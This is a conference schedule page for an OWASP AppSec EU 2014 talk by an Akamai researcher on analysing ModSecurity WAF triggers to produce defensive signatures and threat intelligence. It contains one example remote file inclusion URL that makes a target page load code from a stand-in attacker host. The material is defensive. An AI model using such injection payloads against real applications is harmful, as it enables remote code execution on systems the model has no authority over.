Loading…
This event has ended. View the official site or create your own event → Check it out
This event has ended. Create your own
Welcome to the full schedule of the OWASP AppSec Research EU 2014 conference days
View analytic
Wednesday, June 25 • 15:55 - 16:45
Getting New Actionable Insights by Analyzing Web Application Firewall Triggers

Sign up or log in to save this to your schedule and see who's attending!

ModSecurity Web Application Firewall was first released more than a decade ago, available as open source software that gives the ability to protect web applications. Over the years ModSecurity has matured significantly, and is the most widely deployed WAF, protecting millions of websites. A long side ModSecurity engine we can also find OWASP ModSecurity Core Rule Set (CRS), which is a library of generic application security signatures that provide a base level of protection for any web application.

In this presentation I will show an advanced technique for post processing of ModSecurity Core Rule Set WAF triggers in order to generate actionable defenses that are derived from WAF triggers. The objective of the post processing is to improve security controls. Based on the collected malicious HTTP traffic we can produce new insights on our attackers and the techniques they use and as a result we can harden defenses that will improve our mitigations.

The presentation will include detailed description of several techniques with case studies based on real traffic from Akamai's security big data platform (Cloud Security Intelligence).

Example for analysis on remote file inclusion attack:

When analyzing the payload of a remote file inclusion attack we will find a link to a remote source code file the attackers are trying to inject into the vulnerable application.
The injected remote source file is in many cases a static "anchor" in a continues attack campaign that uses various RFI vulnerabilities with the same remote file.

Generating signature that matches attacks based on the attack "anchor" can improve the detection capabilities for ModSecurity CRS and at the same time give better insight on the threat landscape.
More than that, this "anchor" can be used as enrichment for other security controls that monitor URL and domain reputation.

RFI attack:

http://www.target.com/vuln_page.php?file=http://www.attacker.com/malicous.php

In the attack above we can see remote source file located on “www.attacker.com/malicous.php”, using this malicious file can be valuable when:



  • Looking for the same link on HTTP traffic (complementary to ModSecurity CRS rules)



  • Blocking traffic from within the organization to the attacker web application



  • Correlating similar attacks as same distributed attack campaign 



Speakers
avatar for Or Katz

Or Katz

Principal Security Researcher, Akamai
Or is an application security veteran, with years of experience at industry leading vendors, currently serves as principal security researcher for Akamai's Cloud Security Intelligence platform. Or is a frequent speaker in conferences such as RSA, AppSec and CSA. Or has published several innovative articles and white papers on web applications threat intelligence and defensive techniques.


Wednesday June 25, 2014 15:55 - 16:45
LAB003
  • Company 64

Attendees (19)